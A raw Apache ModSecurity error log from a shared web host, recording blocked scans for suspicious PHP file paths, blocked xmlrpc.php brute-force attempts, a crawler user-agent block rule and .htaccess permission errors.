[Tue May 26 19:28:42.168598 2026] [security2:error] [pid 49598:tid 49760] [client 20.63.34.22:12245] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/class-t.api.php"] [unique_id "ahWnEuzJzkdc0Wtdrwtf4gAAAKU"]
[Tue May 26 19:28:42.544540 2026] [core:crit] [pid 49598:tid 49841] (13)Permission denied: [client 40.77.167.27:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 19:28:42.577722 2026] [security2:error] [pid 49598:tid 49736] [client 91.245.236.124:43579] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnEuzJzkdc0Wtdrwtf9QAAAI0"]
[Tue May 26 19:28:42.577811 2026] [security2:error] [pid 49598:tid 49736] [client 91.245.236.124:43579] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnEuzJzkdc0Wtdrwtf9QAAAI0"]
[Tue May 26 19:28:42.591641 2026] [security2:error] [pid 49598:tid 49660] [remote 216.73.216.30:21215] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWnEuzJzkdc0Wtdrwtf9gAA7T0"]
[Tue May 26 19:28:42.691077 2026] [security2:error] [pid 49598:tid 49835] [client 20.63.34.22:12275] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.34.63.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/wp-slss.php"] [unique_id "ahWnEuzJzkdc0Wtdrwtf9wAAAPA"]
[Tue May 26 19:28:42.691219 2026] [security2:error] [pid 49598:tid 49835] [client 20.63.34.22:12275] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/wp-slss.php"] [unique_id "ahWnEuzJzkdc0Wtdrwtf9wAAAPA"]
[Tue May 26 19:28:42.745646 2026] [core:crit] [pid 49598:tid 49850] (13)Permission denied: [client 40.77.167.27:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 19:28:42.844849 2026] [security2:error] [pid 49598:tid 49855] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWnEuzJzkdc0Wtdrwtf6wAAAQQ"]
[Tue May 26 19:28:43.079746 2026] [security2:error] [pid 49598:tid 49821] [client 20.63.34.22:12123] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.34.63.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/crgio.php"] [unique_id "ahWnE-zJzkdc0WtdrwtgAgAAAOI"]
[Tue May 26 19:28:43.079846 2026] [security2:error] [pid 49598:tid 49821] [client 20.63.34.22:12123] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/crgio.php"] [unique_id "ahWnE-zJzkdc0WtdrwtgAgAAAOI"]
[Tue May 26 19:28:43.343520 2026] [security2:error] [pid 49598:tid 49735] [client 91.245.236.124:50267] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnE-zJzkdc0WtdrwtgDwAAAIw"]
[Tue May 26 19:28:43.343656 2026] [security2:error] [pid 49598:tid 49735] [client 91.245.236.124:50267] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnE-zJzkdc0WtdrwtgDwAAAIw"]
[Tue May 26 19:28:43.493777 2026] [security2:error] [pid 49598:tid 49729] [client 45.154.98.236:60366] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 236.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mexicoimportaciones.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWnE-zJzkdc0WtdrwtgEwAAAIY"], referer: www.google.com
[Tue May 26 19:28:43.495141 2026] [security2:error] [pid 49598:tid 49853] [client 45.154.98.236:60358] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 236.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mexicoimportaciones.com"] [uri "/wp-plain.php"] [unique_id "ahWnE-zJzkdc0WtdrwtgFAAAAQI"], referer: www.google.com
[Tue May 26 19:28:43.608278 2026] [security2:error] [pid 49598:tid 49851] [client 20.63.34.22:12115] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.34.63.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/Okxob.php"] [unique_id "ahWnE-zJzkdc0WtdrwtgFgAAAQA"]
[Tue May 26 19:28:43.608371 2026] [security2:error] [pid 49598:tid 49851] [client 20.63.34.22:12115] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/Okxob.php"] [unique_id "ahWnE-zJzkdc0WtdrwtgFgAAAQA"]
[Tue May 26 19:28:43.658272 2026] [security2:error] [pid 49598:tid 49774] [client 45.154.98.236:60469] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 236.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mexicoimportaciones.com"] [uri "/wp-content/plugins/fix/up.php"] [unique_id "ahWnE-zJzkdc0WtdrwtgGQAAALM"]
[Tue May 26 19:28:43.790499 2026] [security2:error] [pid 49598:tid 49824] [client 45.154.98.236:53915] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 236.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mexicoimportaciones.com"] [uri "/whjgaxzt.php"] [unique_id "ahWnE-zJzkdc0WtdrwtgIAAAAOU"], referer: www.google.com
[Tue May 26 19:28:43.937526 2026] [security2:error] [pid 49598:tid 49849] [client 45.154.98.236:60481] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 236.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mexicoimportaciones.com"] [uri "/wp-plain.php"] [unique_id "ahWnE-zJzkdc0WtdrwtgJAAAAP4"], referer: www.google.com
[Tue May 26 19:28:43.939016 2026] [security2:error] [pid 49598:tid 49762] [client 45.154.98.236:53929] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 236.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mexicoimportaciones.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWnE-zJzkdc0WtdrwtgJQAAAKc"], referer: www.google.com
[Tue May 26 19:28:44.121047 2026] [security2:error] [pid 49598:tid 49811] [client 91.245.236.124:27741] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnFOzJzkdc0WtdrwtgLgAAANg"]
[Tue May 26 19:28:44.121152 2026] [security2:error] [pid 49598:tid 49811] [client 91.245.236.124:27741] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnFOzJzkdc0WtdrwtgLgAAANg"]
[Tue May 26 19:28:44.133761 2026] [security2:error] [pid 49598:tid 49739] [client 20.63.34.22:12207] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.34.63.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/mass.php"] [unique_id "ahWnFOzJzkdc0WtdrwtgLwAAAJA"]
[Tue May 26 19:28:44.133847 2026] [security2:error] [pid 49598:tid 49739] [client 20.63.34.22:12207] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/mass.php"] [unique_id "ahWnFOzJzkdc0WtdrwtgLwAAAJA"]
[Tue May 26 19:28:44.390749 2026] [security2:error] [pid 49598:tid 49758] [client 45.154.98.236:61806] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 236.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mexicoimportaciones.com"] [uri "/audvazfp.php"] [unique_id "ahWnFOzJzkdc0WtdrwtgPwAAAKM"], referer: www.google.com
[Tue May 26 19:28:44.410263 2026] [security2:error] [pid 49598:tid 49804] [client 20.63.34.22:12247] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.34.63.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/dropdown.php"] [unique_id "ahWnFOzJzkdc0WtdrwtgQAAAANE"]
[Tue May 26 19:28:44.410372 2026] [security2:error] [pid 49598:tid 49804] [client 20.63.34.22:12247] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/dropdown.php"] [unique_id "ahWnFOzJzkdc0WtdrwtgQAAAANE"]
[Tue May 26 19:28:44.854163 2026] [security2:error] [pid 49598:tid 49805] [client 20.63.34.22:12097] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.34.63.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/wp-good.php"] [unique_id "ahWnFOzJzkdc0WtdrwtgVAAAANI"]
[Tue May 26 19:28:44.854254 2026] [security2:error] [pid 49598:tid 49805] [client 20.63.34.22:12097] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/wp-good.php"] [unique_id "ahWnFOzJzkdc0WtdrwtgVAAAANI"]
[Tue May 26 19:28:44.884651 2026] [security2:error] [pid 49598:tid 49845] [client 91.245.236.124:48649] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnFOzJzkdc0WtdrwtgVgAAAPo"]
[Tue May 26 19:28:44.884776 2026] [security2:error] [pid 49598:tid 49845] [client 91.245.236.124:48649] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnFOzJzkdc0WtdrwtgVgAAAPo"]
[Tue May 26 19:28:44.956691 2026] [security2:error] [pid 49598:tid 49838] [client 85.208.96.210:22142] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/category/no-school/page/3/"] [unique_id "ahWnFOzJzkdc0WtdrwtgWQAAAPM"]
[Tue May 26 19:28:44.956795 2026] [security2:error] [pid 49598:tid 49838] [client 85.208.96.210:22142] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/category/no-school/page/3/"] [unique_id "ahWnFOzJzkdc0WtdrwtgWQAAAPM"]
[Tue May 26 19:28:45.116291 2026] [security2:error] [pid 49598:tid 49791] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWnFOzJzkdc0WtdrwtgSgAAAMQ"]
[Tue May 26 19:28:45.218900 2026] [security2:error] [pid 49598:tid 49778] [client 20.63.34.22:12183] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.34.63.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/mifta.php"] [unique_id "ahWnFezJzkdc0WtdrwtgXgAAALc"]
[Tue May 26 19:28:45.218987 2026] [security2:error] [pid 49598:tid 49778] [client 20.63.34.22:12183] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/mifta.php"] [unique_id "ahWnFezJzkdc0WtdrwtgXgAAALc"]
[Tue May 26 19:28:45.505444 2026] [security2:error] [pid 49598:tid 49811] [client 20.63.34.22:12202] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.34.63.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/amxloxxr.php"] [unique_id "ahWnFezJzkdc0WtdrwtgaAAAANg"]
[Tue May 26 19:28:45.505561 2026] [security2:error] [pid 49598:tid 49811] [client 20.63.34.22:12202] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/amxloxxr.php"] [unique_id "ahWnFezJzkdc0WtdrwtgaAAAANg"]
[Tue May 26 19:28:45.662159 2026] [security2:error] [pid 49598:tid 49850] [client 91.245.236.124:59537] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnFezJzkdc0WtdrwtgbAAAAP8"]
[Tue May 26 19:28:45.662295 2026] [security2:error] [pid 49598:tid 49850] [client 91.245.236.124:59537] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnFezJzkdc0WtdrwtgbAAAAP8"]
[Tue May 26 19:28:45.973710 2026] [security2:error] [pid 49598:tid 49832] [client 20.63.34.22:12268] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.34.63.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/file59.php"] [unique_id "ahWnFezJzkdc0WtdrwtgcwAAAO0"]
[Tue May 26 19:28:45.973817 2026] [security2:error] [pid 49598:tid 49832] [client 20.63.34.22:12268] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/file59.php"] [unique_id "ahWnFezJzkdc0WtdrwtgcwAAAO0"]
[Tue May 26 19:28:46.106538 2026] [core:crit] [pid 49598:tid 49818] (13)Permission denied: [client 157.55.39.9:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 19:28:46.275336 2026] [security2:error] [pid 49598:tid 49851] [client 20.63.34.22:12238] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.34.63.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/asasx.php"] [unique_id "ahWnFuzJzkdc0WtdrwtgfgAAAQA"]
[Tue May 26 19:28:46.275465 2026] [security2:error] [pid 49598:tid 49851] [client 20.63.34.22:12238] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/asasx.php"] [unique_id "ahWnFuzJzkdc0WtdrwtgfgAAAQA"]
[Tue May 26 19:28:46.443656 2026] [security2:error] [pid 49598:tid 49732] [client 91.245.236.124:45239] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnFuzJzkdc0WtdrwtgggAAAIk"]
[Tue May 26 19:28:46.443784 2026] [security2:error] [pid 49598:tid 49732] [client 91.245.236.124:45239] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnFuzJzkdc0WtdrwtgggAAAIk"]
[Tue May 26 19:28:46.524230 2026] [core:crit] [pid 49598:tid 49845] (13)Permission denied: [client 40.77.167.7:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 19:28:46.578100 2026] [security2:error] [pid 49598:tid 49803] [client 20.63.34.22:12107] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.34.63.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/wp-admin/network/edit.php"] [unique_id "ahWnFuzJzkdc0WtdrwtgigAAANA"]
[Tue May 26 19:28:46.578258 2026] [security2:error] [pid 49598:tid 49803] [client 20.63.34.22:12107] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/wp-admin/network/edit.php"] [unique_id "ahWnFuzJzkdc0WtdrwtgigAAANA"]
[Tue May 26 19:28:46.698791 2026] [core:crit] [pid 49598:tid 49741] (13)Permission denied: [client 40.77.167.7:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 19:28:46.913182 2026] [security2:error] [pid 49598:tid 49767] [client 20.63.34.22:12161] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.34.63.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/ms-edit.php"] [unique_id "ahWnFuzJzkdc0WtdrwtglwAAAKw"]
[Tue May 26 19:28:46.913332 2026] [security2:error] [pid 49598:tid 49767] [client 20.63.34.22:12161] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/ms-edit.php"] [unique_id "ahWnFuzJzkdc0WtdrwtglwAAAKw"]
[Tue May 26 19:28:47.319040 2026] [security2:error] [pid 49598:tid 49840] [client 91.245.236.124:22403] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnF-zJzkdc0WtdrwtgqAAAAPU"]
[Tue May 26 19:28:47.319148 2026] [security2:error] [pid 49598:tid 49840] [client 91.245.236.124:22403] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnF-zJzkdc0WtdrwtgqAAAAPU"]
[Tue May 26 19:28:47.450178 2026] [security2:error] [pid 49598:tid 49742] [client 20.63.34.22:12201] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.34.63.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/file4.php"] [unique_id "ahWnF-zJzkdc0WtdrwtgrgAAAJM"]
[Tue May 26 19:28:47.450309 2026] [security2:error] [pid 49598:tid 49742] [client 20.63.34.22:12201] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/file4.php"] [unique_id "ahWnF-zJzkdc0WtdrwtgrgAAAJM"]
[Tue May 26 19:28:47.719542 2026] [security2:error] [pid 49598:tid 49739] [client 20.63.34.22:12278] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.34.63.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/hplfuns.php"] [unique_id "ahWnF-zJzkdc0WtdrwtguwAAAJA"]
[Tue May 26 19:28:47.719673 2026] [security2:error] [pid 49598:tid 49739] [client 20.63.34.22:12278] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/hplfuns.php"] [unique_id "ahWnF-zJzkdc0WtdrwtguwAAAJA"]
[Tue May 26 19:28:47.834589 2026] [security2:error] [pid 49598:tid 49678] [remote 216.73.216.30:1250] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWnF-zJzkdc0WtdrwtgvAAAuE8"]
[Tue May 26 19:28:47.925674 2026] [security2:error] [pid 49598:tid 49822] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWnF-zJzkdc0WtdrwtgswAAAOM"]
[Tue May 26 19:28:48.040304 2026] [security2:error] [pid 49598:tid 49826] [client 190.7.146.38:54774] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "www.plenitudotonal.com"] [uri "/index.php"] [unique_id "ahWnF-zJzkdc0WtdrwtgrAAA50k"], referer: https://www.plenitudotonal.com/2023/
[Tue May 26 19:28:48.095941 2026] [security2:error] [pid 49598:tid 49799] [client 91.245.236.124:30071] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnGOzJzkdc0WtdrwtgxwAAAMw"]
